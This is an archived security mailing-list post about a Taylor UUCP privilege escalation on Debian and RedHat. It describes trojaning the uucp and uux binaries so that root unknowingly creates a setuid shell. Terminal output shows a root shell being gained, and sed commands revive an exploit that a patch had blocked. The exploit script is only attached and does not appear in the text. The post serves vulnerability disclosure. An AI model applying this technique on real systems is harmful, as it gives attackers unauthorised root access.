Re: uucp --config patch -- not sufficient

[Charles 'core' Stevenson <core () bokeoa com>]

On debian the uucp and uux binaries are owned by the uucp user.
Additionally  /usr/lib/uucp is writeable by the uucp user. This allows
us to have some fun since we don't have that nasty makewhatis, but we
can still get root by trojaning uucp and uux and hoping a root owned
process executes either one. Attached is an exploit based on zen's which
trojans uucp and uux transparently to root or the user by allowing
normal execution and hiding the true argv[0]. If root runs the command
we create a suid shell in /var/tmp.

[core@devastator:~/tmp/debian-uucp]$ ./exp-erm.sh
o Checking if uucp is installed
o Creating exploit files
o Sent the commands : Sleeping 2 seconds.
o Cleaning up /var/tmp
o Trojaning uucp and uux
o Running the uucp shell. You should remove this when you're done.
sh-2.05$ ls -l .sushi
-rwxrwxr-x    1 core     core         5078 Jan 20 03:54 .sushi

Root haplessly runs uux or uucp:

root@devastator:~# uucp --help
Taylor UUCP 1.06.1, copyright (C) 1991, 92, 93, 94, 1995 Ian Lance
Taylor
Usage: uucp [options] file1 [file2 ...] dest
 -c,--nocopy: Do not copy local files to spool directory
 -C,-p,--copy: Copy local files to spool directory (default)
 -d,--directories: Create necessary directories (default)
 -f,--nodirectories: Do not create directories (fail if they do not
exist)
 -g,--grade grade: Set job grade (must be alphabetic)
 -m,--mail: Report status of copy by mail
 -n,--notify user: Report status of copy by mail to remote user
 -R,--recursive: Copy directories recursively
 -r,--nouucico: Do not start uucico daemon
 -s,--status file: Report completion status to file
 -j,--jobid: Report job id
 -W,--noexpand: Do not add current directory to remote filenames
 -t,--uuto: Emulate uuto
 -u,--usage name: Set user name
 -x,--debug debug: Set debugging level
 -I,--config file: Set configuration file to use
 -v,--version: Print version and exit
 --help: Print help and exit

Checking back in with the hacker we find a suid shell :)

sh-2.05$ ls -l .sushi
-rwsr-xr-x    1 root     root         5078 Jan 20 03:54 .sushi
sh-2.05$ ./.sushi
sh-2.05# 

Tested on stable and unstable. This exploit is not specific to any
certain arch.

Best Regards,
Charles 'core' Stevenson

zen-parse wrote:
> Problem:        uucp patch from RedHat (possibly others) prevents
>                 original exploit, but not variations.
>
> Severity:       Potential for local root on some distributions,
>                 uucp.uucp on others.
>
>       https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=54466
>
> I had seen this report some time ago, and thought: "Good. They've got a
> bug report. That'll get it fixed. They'll check that before they release a
> new version, at least."
>
> They didn't.
>
> The patch does prevent the original exploit from working.
>
> However, a trivial patch to the exploit I posted makes it work again.
> local user -> uucp (via this problem) -> root (on some distributions, via
> /usr/sbin/makewhatis: '${PATH:0:1} (or similar) + redirection characters'
> issue.)
>
> $ cd redhat7.0-uucp-to-root
> $ sed s/--config/--confi/ < exp-erm.sh >tmp-exp-erm.sh
> $ mv tmp-exp-erm.sh exp-erm.sh
> $ ./runme
>
> and wait for /tmp/rootshell to appear.
>
> (Does anyone at RedHat actually read their bugzilla posts? Might it not be
> an idea to make anything flagged as security actually get looked at by
> someone? 2001-10-09 seems along time for that to go unnoticed.)
>
> -- zen-parse
>
> --
> -------------------------------------------------------------------------
> 1) If this message was posted to a public forum by zen-parse () gmx net, it
> may be redistributed without modification.
> 2) In any other case the contents of this message is confidential and not
> to be distributed in any form without express permission from the author.
> This document may contain Unclassified Controlled Nuclear Information.

Attachment: debian-uucp.tar.gz
Description: